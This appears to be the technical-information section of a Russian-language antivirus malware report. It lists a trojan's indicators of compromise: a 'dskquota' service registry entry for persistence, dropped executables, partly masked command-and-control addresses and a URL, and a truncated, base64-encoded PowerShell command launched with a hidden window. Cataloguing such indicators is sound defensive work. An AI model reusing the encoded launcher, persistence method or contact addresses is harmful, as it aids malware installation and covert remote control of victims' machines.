Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\dskquota] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dskquota] 'ImagePath' = '"%WINDIR%\SysWOW64\TSTheme\dskquota.exe"'
- 'dskquota' "%WINDIR%\SysWOW64\TSTheme\dskquota.exe"
- 'dskquota' %WINDIR%\SysWOW64\TSTheme\dskquota.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMAFUAUwBDAEcAZwBzAGMAPQAnAFkAUABKAFQASQBiAHUAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwBVAGAAUgBgAEkAVABZAFAAYABSAE8AYABUAE8AQwBvAGwAIgAgAD...
- %HOMEPATH%\572.exe
- %WINDIR%\syswow64\tstheme\dskquota.exe
- %HOMEPATH%\572.exe в %WINDIR%\syswow64\tstheme\dskquota.exe
- '71.##.180.213':80
- '18#.#6.148.68':443
- http://18#.##.148.68:443/YF6e5fBXMUVGb63tI/3SVHH8K5plCy9jQ6/ via 18#.#6.148.68
- DNS ASK di##ain.es
- '%HOMEPATH%\572.exe'
- '%WINDIR%\syswow64\tstheme\dskquota.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABMAFUAUwBDAEcAZwBzAGMAPQAnAFkAUABKAFQASQBiAHUAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwBVAGAAUgBgAEkAVABZAFAAYABSAE8AYABUAE8AQwBvAGwAIgAgAD...' (со скрытым окном)